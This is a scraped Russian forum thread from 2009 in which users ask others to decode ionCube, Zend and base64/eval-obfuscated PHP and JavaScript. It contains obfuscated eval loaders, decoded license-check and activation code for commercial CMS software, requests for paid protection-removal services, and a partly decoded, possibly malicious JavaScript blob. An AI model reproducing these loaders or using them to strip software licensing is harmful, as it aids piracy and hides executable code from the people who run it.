R9tVexcOZ3w8rZ+ge8THeI8g2PP1HingAJvwkrScjnAMwxnVBd ZZsv2DkfkcYe0RmQTc+FVJ0eBd
0NWu1YWhANMQ8jOqtweDLxBDXkhaxZD2oRdtFbjW+O/qA61EOXi65YlTIG16xAXeLUKW0kuVQs+H
3Cmgo6v6yPD0+5AtyKbwu247fj0q0eM/RPKCsJegdRfAhBqETVibk9vl/L6I1QwB1384Vj2K4q5y
CpDJ8bZ3obcLd28I5Q4V35pNQw1WUk6z8Ofo3xA8MLjMH1RxAA miiGEKBBcWRlKPPzqtAWBx9MCC
Ry0fmn5Ma6D7lclGDaeaCTyHQIZHbVH044o9V4p5a7ldP1FSSx/GsHOXvuxm3K8Al7Yk2DyJb2Ku
f1/ITJqU+DgHcQbKVpYriLQlSvZzDsg7VuCvCQnlRyJYe4rBzbaL7 3DQ2eft7OSrMJcVQn66ldYO
dw+5CGN6MYTVxOeIDAxa7MiT0Lv3bDytfRLZfjSb1az67jhggJ RijLjVJLgPiStIXsAm1K3bum65
cMiWAEAV3TxY3i2emHlv7LWSkf2tWgleli6K6tyZQNWBkDY7Y+ dR8RBiaeMfpzBe+5/uXhld2hPJ
WZVHx1fmscTL4bbBCILZuUtA8mVzrb9M2V/5JfKm13sHHVSwXbmfo+TDj4ocKgce2xgSLh0jW3Tx
fCxYvQ/BcxGsmCmX7clMKVAUY1B0mKxJQZ6MLGiejoL1YR9YX14xf0gfK rTJtjToRvqt5fYKsew0
hT92rlYxaIcNQOpPMdlei5cMxtDsS1LJtXiAOHcvJQgYxsyYMb QoHXaSL/y8s9JXboLnFXpi9pei
CyzvMdepar7gcuP29/KdSqgrTlEOJnAnkYqPdqtM8QTe4IydxKfoyZIIpJ41Cf7gLBLJ LiprMYOp
8XUkFysR6vSPwbInOUBa/h9JUkZxbkyDLOBWkIhUj2F3cv4D2PXhOt6kJPDign5DY/hTAa2Mbx2A
VbPW/bPWVz21C4vE0f8WIDhVvmBnQVwwIdjyfzwJi0G2QjeGj1SBh5l XhzzkUbI4truoEslch7qi
cgTaM06OHoX5iTsHgmsn4yyRokGI6R4j22d/bWqXiAMJoGobnsQdJMpe2JAUTi3pEVtqYag55o2/
DXJ4PMp604k0w0ChhCl+JUx3wrbY3Nf6Cyq6psQayYT08pCQjz S+WxwT3lYvmG7E61rMB5jl9O7Q
LphJCVBLs4q2jGEmbBjuYGafl7BodEpVxv7SFzw6O3TyE/0a64wYfBMPtQp3wO2/7pEZwckrpBYr
yNZZ7LYLPHpY44XpZWnDTapU/10K0//zqfguCZEChyBgGODd1OBfOeu0lIKwEPpnVXESdPszzXuK
VYPdzRQxldp8bzNoqlfFVFi1JihdUUZik+N+4x2M7WEUqDNJqv IngqDxVfLtL0jJqs5ZTQOJwX3q
wLRyV6sq4l4QPH99BwIJfhmRtgm1PZ0Qs+pblvpuw59bcWhPMJ SzAMud9ggjkySbUb9ADBYKGc/8
LJZKdg7ZRUAeg9SIGZS0U7tt63K7q67bVpTGaMtXSH2mVBk/QB06LqS2WL+MZpGU86hstkDuw4Wu
HtnL+Aq5udv9zUt0H7hjJXmieE85z/KKku0VZ2zGWtdFpROKG89cdOVYVN+45HaZfMnHDqnLDYnu
CzOqRN0/kX7oR50UpEXj+vsC0siK3u+LYgF2vNlOMCrG20AW6WWh+MECl6 T8c6jfTvEHU3ikgAlc
2bmDyA9lnZ2TPA9yx7gmpt/gtH4Q3DJxHq+G143vWdI6n//Dh6nYqRH5+vi4RooQLL0K/U1IfkXT
hZQWqd/dBQyJtkXtRAfdjIzPxf5maGywW1KTKV3H7C44be/yG1LqhX+o8E5hJWLno2fT9OXhrhNL
LT6b6/cu6W==

я знаю что с ioncube заморочки, я гуглил, и почти везде лохотрон и запароленые архивы. бруткит если и проходит, то всё равно часть кода вырезана умышленно. Вроде на hzzp://www.nulled.ws/showthread.php?t=57482&page=13 есть что-то, но толком не понятно

Pashkela

31.10.2009, 19:39

ionCube нахаляву врядли кто возьмется. Ну по крайней мере прецедентов не помню

reprimand

31.10.2009, 19:59

Я не уверен что хоть кто-нибудь даже платно может ionCube декодиировть т.к. судя по многочисленному лохотрону это почти невозможно.

Pashkela

31.10.2009, 20:05

Размещай в "работе", работай через гаранта, что тебе еще сказать даже не знаю

reprimand

31.10.2009, 20:17

Размещай в "работе", работай через гаранта, что тебе еще сказать даже не знаю

это мне понадобилось для hzzp://www.vidiscript.com/get а платить на hzzp://www.vidiscript.com/extras.html не хочется(((

Trawalex

04.11.2009, 18:14

<?php $curversion = '1.0 West Edition'; $o = "QAAAOzh3b3cKDSgtJ8Un9vX36QAA7eIn6u/h4ifg5+bv9Sft6QAg6O/35+71Kyf05gCQ+Cfi5OkAACsn9fwn6+nh4v/7J/fn9ugAAPfp/uf1+/b4J/bpJ/bl6e8AAOsn9ffi7eL36esmPC4nUEYAAFVJTklAPSdTb250J2Fu a2JAACcAgHd1aHNiZHNiYydlfidkAABod351bmBvcyYnLSgKDW FyAABpZHNuaGknan50dmtYamhjAABuYW5iY1h1aHB0Ly4nfAoN EjEOI2YA4ic6AkRmYWEE4gFjLy48AkEA0G5pYWhYdHN1AmYBES cB02J1YmAEACcvJyVVBUAnamZzZG9iYz0nAA4vXDcqPlotLiUr JyMC0QPhALB1UAhYAiQnBZJ1YnNydWknLwhVOyc2GKAuJzgBAA KHXDZaASAjARs9JzcuJzcAPScDdAoweg7IEEYOJGBraGVmaycj ACBkcnVxYnV0bmhpAxAOI0BLSAEIRUZLVCdcJQMWdjU0NgAxNj VlAUBtZWljZXRmAFBtATI0ZmJ2NTYIEDQ1dHAA8HRwb2BtdgLA JVonOgAEJyV0ZmNjNmFwYjMxMgAwdTIGAHYxYnZwAtACoDJwMz F0NDZ2cAhBYjI2NAAgMjYyJQfhd3VuaXMTYRgAV2hwFBAbwjtm J291YmE6WyVvAABzc3c9KChkfmVidSpzail1AAByKFslOUR+RU JVb353YidTABh1ZmRsYnUncSUnKQ2JAOAlOygJBGY5JyENMSdE BAFTYmZqJwKBL2MQAWZzYgcxXiUnLic5JzU3Nz8VoEjwJQCBKi UU4CUlLgQQAmoaURW5dHNjYR+BaGhzFZ0nVRQPFA8UCiEgdHRY cnVuAJBBAXMNU1hrZmlgAPB2cmJ1bmJ0AKADUHN0c2Z1cwCQAT F+JJBmANZzbmpigEEBkERSVUBVSFJXALB0b2hwWDEwFiRkYnQD wWQfRgHAZWJYC+FidRghbmHAkCZwASYuCg0ODnUo4yAgAgFia3 Ri1QABUSKHIALmIB9xNgJhdWJ2cm51YlgQC2hpZBXAJXNvYmpi dCgW8SMNkxUgAV4lKHNiandrF+ApQgAlFUEGsAOPA4904sIW8w N3C1FkaHIjsiMQ9x0AISEnIxB1JwABXCBkZmlYcW5icGNiZXJg CvDIwAHxEbknOiuAfmJ0HzBAUQ5haHViZgQAZG8nLycFeWZ0Jy NsYn4nOjkBoCcjcWZrcmIGkALyDiwGO2NucTlUg1wPES8Csiw8 ISknMZE5JztlOQGjA9MAQFwldGJkaGljdAHgOSc3KTc2iCAoAT thaA0AZGhraHUvsHViY1slAgAnc25za2IA4Nfi7enr4urj9CAD 4vVRUOno9e/r7+Dv9+nlUmBVcAAA6Pfp9iknxffi6/gn7/bo6QAA7Ori6u/4J+j34uX8/+fi9QHzJ+rp9+v0KTPACHEMNAhpCpA7KAgBCoAQST0nJQi7YHV iYmkI2MDnBwEn6l1gGQT04eMF8Akw5ScJVOfx7+8pCL/j6RPh6PT2C2Dp4ghvEMYIaDghPDBlOSdcCvNCalweYlpaOygWk VtpO8AngQ45YA4YaGUewXUnKAxAJcIBsSKRJkG5XtMOODkKDQ5 pQBAlFwAlJ3RufWI6NTka8Mri6eYAEPLp4+/r6Sf07efgFnHl4vf2IAPv+RVQ6eP07fXnJjsoZTkTVATAb584M kAHFSNHYWfiQJ9An0CaJyYpAFSPVI9UiA0/xAAkQg09zenodvDu9Sfq5yfr4vb1cADpDC8U4QxQODk="; eval ( base64_decode ( "JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3 hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9 MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OU oyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxs bGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz 0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgk bFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbG xsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214 bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm 9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxs bGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJG xsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxb JGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJj B4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytd KTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj 40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxs bCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JG xsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxs bGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JG xsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytd KTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKz E2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxs bGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXS kpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxs bGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbC srXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRs bGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5Sn pzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4 c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk 1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxs bGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbG xsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxs bGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3 VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtl dmFsKCRsbGxsbGxsbGwpOw==" ) ); return; ?>

Расшифруйте пожалуйста

Kaimi

04.11.2009, 18:22

<?php
$curversion = '1.0 West Edition';
/* В строке ниже забит копирайт, убирая его, ты можешь распрощаться со своим трекером!;) WARNING: This file is protected by copyright! */
function mysql_modified_rows() {
$a_rows = mysql_affected_rows ();
$info_str = mysql_info ();
ereg ( "Rows matched: ([0-9]*)", $info_str, $r_matched );
return ($a_rows < 1) ? ($r_matched [1] ? $r_matched [1] : 0) : $a_rows;
}
function copyright() {
global $curversion;
$GLOBALS ["copyrightq231231212bjbndbsandbj123123aeq2132sw123s whgjq312"] = "sadd1fwe465465r5q6eqw2131235w46s31qwe513131515";
print ( "Powered by <a href=\"http://cyber-tm.ru/\">CyBERhype Tracker v" . $curversion . "</a> &copy CyberTeam " . (date ( "Y" ) > 2008 ? "2008-" : "") . date ( "Y" ) );
}
function stdfoot() {
global $copyrightq231231212bjbndbsandbj123123aeq2132sw123 swhgjq312, $ss_uri, $tracker_lang, $queries, $tstart, $query_stat, $querytime, $CURGROUP, $show_process, $curversion, $be_footer;
if ($be_footer)
return '';
else
$GLOBALS ['be_footer'] = 1;
require_once ("themes/" . $ss_uri . "/template.php");
require_once ("themes/" . $ss_uri . "/stdfoot.php");
if (count ( $query_stat ) && $CURGROUP ['can_viewdebug'] && $show_process == "yes") {
foreach ( $query_stat as $key => $value ) {
print ( "<div>[" . ($key + 1) . "] => <b>" . ($value ["seconds"] > 0.01 ? "<font color=\"red\" title=\"Рекомендуется оптимизировать запрос. Время исполнения превышает норму.\">" . $value ["seconds"] . "</font>" : "<font color=\"green\" title=\"Запрос не нуждается в оптимизации. Время исполнения допустимое.\">" . $value ["seconds"] . "</font>") . "</b> [$value[query]]</div>\n" );
}
print ( "<br />" );
}
if (! $curversion) {
?>

<font color="red" size=2><b>Необходимо указать версию продукта!</b></font>
<?
}
if ($copyrightq231231212bjbndbsandbj123123aeq2132sw12 3swhgjq312 != "sadd1fwe465465r5q6eqw2131235w46s31qwe513131515") {
?>
<font color="red" size=2><b>Копирайт на место!</b></font>
<?
}
}
?>

Trawalex

04.11.2009, 19:49

Kaimi Спасибо!

acdel

06.11.2009, 19:45

Подскажите кто и где может оказать услугу. Снять ionCube. Знаю что китайцы вроде снимают его, но не могу найти контакты. Вобщем буду благодарен за инфу по снятию ионКуба.

MafyO_o

08.11.2009, 15:52

а ето разшифруйте пл3!!!
спс норм работает

Kaimi

08.11.2009, 16:13

<?php if( !defined( 'DATALIFEENGINE' ) ) { die( "Hacking attempt!" ); } require_once (ENGINE_DIR . '/inc/include/functions.inc.php'); define( 'INITVERSION', "1083" ); function TF58ACF78647974EA3B4FAFAE5557D130($query, $others = '') { $host = 'dle-news.ru'; $path = '/extras/activate2009.php'; $post = "POST $path HTTP/1.1\r\nHost: $host\r\nContent-type: application/x-www-form-urlencoded\r\n{$others}User-Agent: Mozilla 4.0\r\nContent-length: " . strlen( $query ) . "\r\nConnection: close\r\n\r\n$query"; $h = @fsockopen( $host, 80, $errno, $errstr, 10 ); if( ! $h ) { return "-1"; } else { fwrite( $h, $post ); for($a = 0, $r = ''; ! $a;) { $b = fread( $h, 8192 ); $r .= $b; $a = (($b == '') ? 1 : 0); } fclose( $h ); } if( stristr( $r, "antw:activated" ) ) return "1"; if( stristr( $r, "antw:denied" ) ) return "0"; return "-1"; } function TCFA0EF385A6C78999B8276154656D938() { $domen_md5 = explode( '.', $_SERVER['HTTP_HOST'] ); $count_key = count( $domen_md5 ) - 1; unset( $domen_md5[$count_key] ); if( end( $domen_md5 ) == "com" or end( $domen_md5 ) == "net" ) $count_key --; $domen_md5 = $domen_md5[$count_key - 1]; $domen_md5 = md5( md5( $domen_md5 . "780918" ) ); return $domen_md5; } function T5F5B38991AAEF07A0725636338C3A43A($key, $domen_md5, $config, $offline = false) { include (ROOT_DIR . '/language/' . $config['langs'] . '/adminpanel.lng'); $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; $domain = urlencode( strip_tags( $_SERVER['HTTP_HOST'] ) ); $key = trim( strip_tags( $key ) ); if ( $offline ) { if( $key == md5( $domen_md5 . INITVERSION ) ) { $buffer = "1"; } else { $buffer = "-2"; } } else { if( strlen( $key ) == 32 ) { $buffer = "-3"; } else { $buffer = TF58ACF78647974EA3B4FAFAE5557D130( "domain={$domain}&key={$key}&site_key={$domen_md5}&c_id=" . $config['version_id'] ); } } switch ($buffer) { case "-3" : $buffer = $lang['trial_act6']." ".$lang['key_format']."<b>XXXXX-XXXXX-XXXXX-XXXXX-XXXXX</b>"; break; case "-2" : $buffer = $lang['trial_act5']; break; case "-1" : $buffer = $lang['trial_act1'] . $lang['get_offline_key'] . " <a href=\"http://dle-news.ru/index.php?do=offlinekey&domain={$domain}&key={$key}&site_key={$domen_md5}&c_id=" . $config['version_id'] . "\" target=\"_blank\">" . $lang['get_key'] . "</a> " . $lang['key_activation']; $buffer .= "<br /><br /><b>$lang[site_code]</b><span style=\"padding-left:7px;\"><input class=\"edit\" type=\"text\" size=\"45\" name=\"sitecode\" id=\"sitecode\"> <input class=\"edit\" type=\"button\" onClick=\"dle_activation( 'code' ); return false;\" value=\"$lang[trial_act]\"></span><div id=\"result_info\" style=\"color:red;\"></div>"; break; case "0" : $buffer = $lang['trial_act2']; break; case "1" : $config['key'] = md5( $domen_md5 . INITVERSION ); $handler = fopen( ENGINE_DIR . '/data/config.php', "w" ); fwrite( $handler, "<?PHP \n\n//System Configurations\n\n\$config = array (\n\n" ); foreach ( $config as $name => $value ) { fwrite( $handler, "'{$name}' => \"{$value}\",\n\n" ); } fwrite( $handler, ");\n\n?>" ); fclose( $handler ); $buffer = $lang['trial_act3']; break; default : $buffer = $lang['trial_act4'] . $lang['get_offline_key'] . " <a href=\"http://dle-news.ru/index.php?do=offlinekey&domain={$domain}&key={$key}&site_key={$domen_md5}&c_id=" . $config['version_id'] . "\" >" . $lang['get_key'] . "</a> " . $lang['key_activation']; } @header( "Content-type: text/css; charset=" . $config['charset'] ); echo $buffer; die(); } extract( $_REQUEST, EXTR_SKIP ); require_once (ENGINE_DIR . '/data/config.php'); $domen_md5 = TCFA0EF385A6C78999B8276154656D938(); $lic_tr = true; if( $_REQUEST['activation'] == "yes" ) { if ( $_REQUEST['dle_key'] ) T5F5B38991AAEF07A0725636338C3A43A( $_REQUEST['dle_key'], $domen_md5, $config ); else T5F5B38991AAEF07A0725636338C3A43A( $_REQUEST['site_code'], $domen_md5, $config, true ); exit(); } $auto_detect_config = false; $domen_md5 = md5( $domen_md5 . INITVERSION ); if( $domen_md5 == $config['key'] ) $lic_tr = false; if( $config['http_home_url'] == "" ) { $config['http_home_url'] = explode( $config['admin_path'], $_SERVER['PHP_SELF'] ); $config['http_home_url'] = reset( $config['http_home_url'] ); $config['http_home_url'] = "http://" . $_SERVER['HTTP_HOST'] . $config['http_home_url']; $auto_detect_config = true; } require_once (ENGINE_DIR . '/classes/mysql.php'); require_once (ENGINE_DIR . '/data/dbconfig.php'); $selected_language = $config['langs']; if (isset( $_POST['selected_language'] )) { $_POST['selected_language'] = totranslit( $_POST['selected_language'], false, false ); if (@is_dir ( ROOT_DIR . '/language/' . $_POST['selected_language'] )) { $selected_language = $_POST['selected_language']; set_cookie ( "selected_language", $selected_language, 365 ); } } elseif (isset( $_COOKIE['selected_language'] )) { $_COOKIE['selected_language'] = totranslit( $_COOKIE['selected_language'], false, false ); if (@is_dir ( ROOT_DIR . '/language/' . $_COOKIE['selected_language'] )) { $selected_language = $_COOKIE['selected_language']; } } require_once (ROOT_DIR . '/language/' . $selected_language . '/adminpanel.lng'); $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; check_xss(); $Timer = new microTimer( ); $Timer->start(); if( $_SESSION['dle_log'] > 5 ) die( "Hacking attempt!" ); $is_loged_in = FALSE; $member_id = array (); $result = ""; $username = ""; $cmd5_password = ""; $allow_login = false; $PHP_SELF = $_SERVER['PHP_SELF']; $_IP = $db->safesql( $_SERVER['REMOTE_ADDR'] ); require_once (ENGINE_DIR . '/skins/default.skin.php'); if( isset( $_POST['action'] ) ) $action = $_POST['action']; else $action = $_GET['action']; if( isset( $_POST['mod'] ) ) $mod = $_POST['mod']; else $mod = $_GET['mod']; $mod = totranslit ( $mod, true, false ); $action = totranslit ( $action, false, false ); if( ($mod != "editnews" and $mod != "main" and $mod != "") and $lic_tr ) { $row = $db->super_query( "SELECT COUNT(*) as count FROM " . PREFIX . "_post" ); $stats_news = $row['count']; $row = $db->super_query( "SELECT COUNT(*) as count FROM " . PREFIX . "_comments" ); $count_comments = $row['count']; if( $stats_news > 100 ) msg( "info", "error", $lang['trial_limit'] ); if( $count_comments > 200 ) msg( "info", "error", $lang['trial_limit'] ); } $user_group = get_vars( "usergroup" ); if( ! $user_group ) { $user_group = array (); $db->query( "SELECT * FROM " . USERPREFIX . "_usergroups ORDER BY id ASC" ); while ( $row = $db->get_row() ) { $user_group[$row['id']] = array (); foreach ( $row as $key => $value ) { $user_group[$row['id']][$key] = $value; } } set_vars( "usergroup", $user_group ); $db->free(); } $cat_info = get_vars( "category" ); if( ! is_array( $cat_info ) ) { $cat_info = array (); $db->query( "SELECT * FROM " . PREFIX . "_category ORDER BY posi ASC" ); while ( $row = $db->get_row() ) { $cat_info[$row['id']] = array (); foreach ( $row as $key => $value ) { $cat_info[$row['id']][$key] = stripslashes( $value ); } } set_vars( "category", $cat_info ); $db->free(); } if( count( $cat_info ) ) { foreach ( $cat_info as $key ) { $cat[$key['id']] = $key['name']; $cat_parentid[$key['id']] = $key['parentid']; } } if( $_REQUEST['action'] == "logout" ) { set_cookie( "dle_user_id", "", 0 ); set_cookie( "dle_name", "", 0 ); set_cookie( "dle_password", "", 0 ); set_cookie( "dle_skin", "", 0 ); set_cookie( "dle_newpm", "", 0 ); set_cookie( "dle_hash", "", 0 ); set_cookie( session_name(), "", 0 ); @session_unset(); @session_destroy(); if( $config['extra_login'] ) auth(); msg( "info", $lang['index_msge'], $lang['index_exit'] ); } if( $check_referer ) { if( $_SERVER['HTTP_REFERER'] == '' and $_REQUEST['subaction'] != 'dologin' ) $allow_login = true; elseif( clean_url( $_SERVER['HTTP_REFERER'] ) == clean_url( $_SERVER['HTTP_HOST'] ) ) $allow_login = true; } else { $allow_login = true; } if( $allow_login ) { if( $config['extra_login'] ) { if( ! isset( $_SERVER['PHP_AUTH_USER'] ) || ! isset( $_SERVER['PHP_AUTH_PW'] ) ) auth(); $username = $_SERVER['PHP_AUTH_USER']; $cmd5_password = md5( $_SERVER['PHP_AUTH_PW'] ); $post = true; } elseif( intval( $_SESSION['dle_user_id'] ) > 0 ) { $username = $_SESSION['dle_user_id']; $cmd5_password = $_SESSION['dle_password']; $post = false; } elseif( intval( $_COOKIE['dle_user_id'] ) > 0 ) { $username = $_COOKIE['dle_user_id']; $cmd5_password = $_COOKIE['dle_password']; $post = false; } if( $_REQUEST['subaction'] == 'dologin' ) { $username = $_POST['username']; $cmd5_password = md5( $_POST['password'] ); $post = true; } } if( check_login( $username, $cmd5_password, $post ) ) { $is_loged_in = true; $_SESSION['dle_log'] = 0; $dle_login_hash = md5( strtolower( $_SERVER['HTTP_HOST'] . $member_id['name'] . $cmd5_password . $config['key'] . date( "Ymd" ) ) ); if( ! $_SESSION['dle_user_id'] and $_COOKIE['dle_user_id'] ) { $_SESSION['dle_user_id'] = $_COOKIE['dle_user_id']; $_SESSION['dle_password'] = $_COOKIE['dle_password']; } } else { $_SESSION['dle_log'] = intval( $_SESSION['dle_log'] ) + 1; $dle_login_hash = ""; if( $_REQUEST['subaction'] == 'dologin' ) { $result = "<font color=red>" . $lang['index_errpass'] . "</font>"; } else $result = ""; if( $config['extra_login'] ) auth(); $is_loged_in = false; } if( $is_loged_in and ! $_SESSION['dle_xtra'] and $config['extra_login'] ) { $_SESSION['dle_xtra'] = true; $_REQUEST['subaction'] = 'dologin'; } if( $is_loged_in and $_REQUEST['subaction'] == 'dologin' ) { $_SESSION['dle_user_id'] = $member_id['user_id']; $_SESSION['dle_password'] = $cmd5_password; set_cookie( "dle_user_id", $member_id['user_id'], 365 ); set_cookie( "dle_password", $cmd5_password, 365 ); $time_now = time() + ($config['date_adjust'] * 60); if( $config['log_hash'] ) { $salt = "abchefghjkmnpqrstuvwxyz0123456789"; $hash = ''; srand( ( double ) microtime() * 1000000 ); for($i = 0; $i < 9; $i ++) { $hash .= $salt{rand( 0, 33 )}; } $hash = md5( $hash ); set_cookie( "dle_hash", $hash, 365 ); $_COOKIE['dle_hash'] = $hash; $member_id['hash'] = $hash; $db->query( "UPDATE " . USERPREFIX . "_users set hash='" . $hash . "', lastdate='{$time_now}', logged_ip='" . $_IP . "' WHERE user_id='{$member_id['user_id']}'" ); } else $db->query( "UPDATE " . USERPREFIX . "_users set lastdate='{$time_now}', logged_ip='" . $_IP . "' WHERE user_id='{$member_id['user_id']}'" ); } if( $is_loged_in and $config['log_hash'] and (($_COOKIE['dle_hash'] != $member_id['hash']) or ($member_id['hash'] == "")) ) { $is_loged_in = FALSE; } if( $is_loged_in and $config['ip_control'] == '1' and ! check_netz( $member_id['logged_ip'], $_IP ) and $_REQUEST['subaction'] != 'dologin' ) $is_loged_in = FALSE; if( ! $is_loged_in ) { $member_id = array(); set_cookie( "dle_user_id", "", 0 ); set_cookie( "dle_name", "", 0 ); set_cookie( "dle_password", "", 0 ); set_cookie( "dle_hash", "", 0 ); $_SESSION['dle_user_id'] = 0; $_SESSION['dle_password'] = ""; if( $config['extra_login'] ) auth(); } if ( $is_loged_in ) define( 'LOGGED_IN', $is_loged_in ); header( "Last-Modified: " . gmdate( "D, d M Y H:i:s" ) . " GMT" ); header( "Cache-Control: no-store, no-cache, must-revalidate" ); header( "Cache-Control: post-check=0, pre-check=0", false ); header( "Pragma: no-cache" ); ?>

попугай

09.11.2009, 01:54

Есть желающие? http://forum.antichat.ru/showthread.php?p=1671866

Xcontrol212

09.11.2009, 02:49

Подскажите кто и где может оказать услугу. Снять ionCube. Знаю что китайцы вроде снимают его, но не могу найти контакты. Вобщем буду благодарен за инфу по снятию ионКуба.
qinvent.com вроде они

MafyO_o

10.11.2009, 12:25

а зенд можно розкодирувать?? если да то розкодируйте етот код пл3:
http://depositfiles.com/files/wmnrkbpxp (php файл )

Pashkela

10.11.2009, 12:39

а зенд можно розкодирувать?? если да то розкодируйте етот код пл3:
http://depositfiles.com/files/wmnrkbpxp (php файл )

http://depositfiles.com/files/6g14m9d6l

seofilms

10.11.2009, 17:48

Помогите расшифровать javascript плиз...
http://slil.ru/28185653
Заранее спасибо.

M_script_

10.11.2009, 23:13

Помогите расшифровать javascript плиз...
http://slil.ru/28185653
Заранее спасибо.

Первая часть расшифровки есть, кто дальше? =)
cc="ds.length;i +){tmp=ds.slice(i,i+1)";
st="st=\"$a=st;dcs(da+db dc+dd+de,10);dw(st);st=$a;\";";
cb="ape(ds);st=tmp='';for(i=0;i<";
db="9+tqdu>cudTqdu8tqdu>wudTqdu890=0#9+0dy}uK7iuqb7M0-0tqdu>wudVe||Iuqb89+dy}uK7}%7F~dx7M0-0tqdu>wud]%7F~dx89;!+dy}uK7tqi7M0-0tqdu>wudTqdu89+yv08tqdu>wudTqi890--0!0ll0tqdu>wudTqi890--0%260ll0tqdu>wudTqi890--0$9ktqdu>cudTqdu8tqdu>wudTqdu890=0!9+0dy}uK7tqi7M0-0tqdu>wudTqdu89+0dy}uK7}%7F~dx7M0-0tqdu>wud]%7F~dx89;!+0dy}uK7iuqb7M0-0tqdu>wudVe||Iuqb89+0m0tqdu>cudTqdu8tqdu>wudTqdu890;";
dc="0!9+0yv08tqdu>wud]%7F~dx89;!0,0!%209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07=%2070;08tqdu>wud]%7F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07=70;08tqdu>wud]%7F~dx89;!9+myv08tqdu>wudTqdu890;!0,0!%209kcxyvdY~tuh0-cxyvdY~tuh0;07=%2070;0tqdu>wudTqdu89+mu|cukcxyvdY~tuh0-0cxyvdY~tuh0;07=70;0tqdu>wudTqdu89+mcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKcxyvdY~tuhMK%20M>aeubi>sxqbS%7FtuQd8!9+ve~sdy%7F~0S";
op="$a=\"dw(dcs(cu,14));\";";
cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.; ;rvwyr}f:w{y;xp;ub{fd%;64c}p`|)%$$4|q}s|`),$*(;}rf uyq*(;p}b*";
dz="function dw(t){ca='document.write("';ce='")';cb='<script language=\"javascript\">';cc='<\/script>';eval(unescape(t))};";
de="iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9 050!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90. .0$90;0~e}9050!%209M+}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddu bcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+4q-4q>bu`|qsu8t<iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxc Kdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+";
dd="q|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}%7F~dx 0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#90 50%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0% 2290;0~e}9050%22%M+";
ce="charCodeAt(0)^('0x00' es)));}}";
cd=";st=st String.fromCharCode((tmp.";
cz="function cz(cz){return ca+cb cc cd ce+cz;};";
